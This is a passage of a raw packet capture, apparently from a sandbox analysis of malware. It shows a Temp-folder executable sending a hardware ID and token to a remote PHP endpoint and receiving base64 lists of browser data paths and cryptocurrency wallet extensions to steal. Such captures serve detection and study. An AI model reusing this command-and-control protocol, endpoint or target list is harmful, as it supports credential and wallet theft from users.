Apr 25, 2024 12:16:09.348309994 CEST	1289	IN	Data Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
Apr 25, 2024 12:16:09.348345995 CEST	1289	IN	Data Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H\|Im8zn2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;,.\|j\[S
Apr 25, 2024 12:16:09.348381996 CEST	1289	IN	Data Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5 Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
Apr 25, 2024 12:16:09.348418951 CEST	1289	IN	Data Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a Data Ascii: ><:X4.`="+P!`p;KE.\|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_\|gYA#8
Apr 25, 2024 12:16:09.348474979 CEST	1289	IN	Data Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43 Data Ascii: 94SI6j<TNmokj>_P7!Wv}!K2@3Cs-<HIo5 Q0V?4v^i2D5v$ip^`RLK$.0 ^wS~W _h:JIEE;/?j8-
Apr 25, 2024 12:16:09.348510981 CEST	1289	IN	Data Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8 Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
Apr 25, 2024 12:16:09.348546982 CEST	1289	IN	Data Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
Apr 25, 2024 12:16:09.348666906 CEST	1289	IN	Data Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb Data Ascii: 2h\T^BTZP{@%{J.B\|n$=6icc6%Zxn1#]\|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
Apr 25, 2024 12:16:09.348704100 CEST	1289	IN	Data Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25 Data Ascii: p_%cBeg3-Ul #B\|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
Apr 25, 2024 12:16:09.587141991 CEST	1289	IN	Data Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be Data Ascii: MomvnhKB~`]2v=zim@M/Fa2\|dov>vk3#qLj[G?&e<kl9SA/vS/DMLaNjF[3);<g2<pUyru{){N8gk{>\|=r2WRBL]+=K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	185.172.128.76	80	5408	C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:16:10.180352926 CEST	417	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJ Host: 185.172.128.76 Content-Length: 216 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 43 44 32 39 43 46 32 33 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"6DCD29CF23942138104604------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"default10------AEHIJKKFHIEGCBGCAFIJ--
Apr 25, 2024 12:16:10.667690039 CEST	347	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Vary: Accept-Encoding Data Raw: 4f 54 6b 35 4e 54 56 69 4e 6a 51 33 4e 44 67 32 5a 44 5a 6d 59 6d 52 6d 59 7a 59 7a 4e 44 6b 78 4d 6d 55 35 4f 47 4a 6a 4f 57 4e 6d 5a 54 4d 34 4d 6a 6b 77 59 7a 67 34 4d 44 52 6a 4f 54 41 33 5a 6d 45 79 5a 44 63 32 4e 7a 4e 6b 4d 44 64 68 59 57 51 77 4f 44 4a 69 5a 57 4d 32 4e 44 52 69 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d Data Ascii: OTk5NTViNjQ3NDg2ZDZmYmRmYzYzNDkxMmU5OGJjOWNmZTM4MjkwYzg4MDRjOTA3ZmEyZDc2NzNkMDdhYWQwODJiZWM2NDRifGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 25, 2024 12:16:10.669378042 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBA Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 2d 2d 0d 0a Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="message"browsers------KFBFCAFCBKFIEBFHIDBA--
Apr 25, 2024 12:16:10.991630077 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
Apr 25, 2024 12:16:10.991650105 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 25, 2024 12:16:10.993328094 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIIIJKFCAAECAKFIEHC Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 43 2d 2d 0d 0a Data Ascii: ------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------FIIIIJKFCAAECAKFIEHCContent-Disposition: form-data; name="message"plugins------FIIIIJKFCAAECAKFIEHC--
Apr 25, 2024 12:16:11.311791897 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
Apr 25, 2024 12:16:11.311806917 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
